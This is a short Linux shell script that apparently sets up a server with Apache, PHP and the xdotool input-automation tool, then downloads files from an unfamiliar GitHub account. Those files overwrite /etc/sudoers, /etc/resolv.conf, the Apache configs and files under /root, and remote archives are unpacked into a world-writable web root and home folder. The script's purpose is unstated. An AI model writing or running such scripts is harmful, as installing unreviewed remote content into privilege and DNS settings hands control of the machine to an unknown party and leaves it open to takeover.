apt-get install -y apache2

apt-get install -y php7.4

apt-get install -y php7.4-gmp

apt-get -y install make

apt-get -y install cmake

apt-get -y install libx11-dev

apt-get -y install libxtst-dev

apt-get -y install libxinerama1 libxinerama-dev

cd /etc/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/resolv.conf

cd /etc/apache2/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/ports.conf

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/apache2.conf

cd /etc/apache2/sites-enabled/

wget -q -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/000-default.conf

service apache2 restart

cd /home/

apt-get install git

git clone https://github.com/jordansissel/xdotool

cd ./xdotool/

git checkout edbbb7a8f664ceacbb2cffbe8ee4f5a26b5addc8

make install

mkdir /home/demo/

mkdir /home/demo/Documents/

cd /home/demo/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/Documents.tar.gz

tar -xvf ./Documents.tar.gz

cd /home/demo/Documents/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/paperspace84.tar.gz

tar -xvf ./paperspace84.tar.gz

chmod 777 -R /home/demo/Documents/

cd /var/www/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/html.tar.gz

tar -xvf ./html.tar.gz

chmod 777 -R /var/www/html/

cd /etc/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/sudoers

chmod 600 -R /etc/sudoers

cd /root/

wget -N https://raw.githubusercontent.com/mobileapps84741274/mobile84741274/master/linuxroot84.tar.gz

tar -xvf ./linuxroot84.tar.gz

cd /var/www/html/google844/
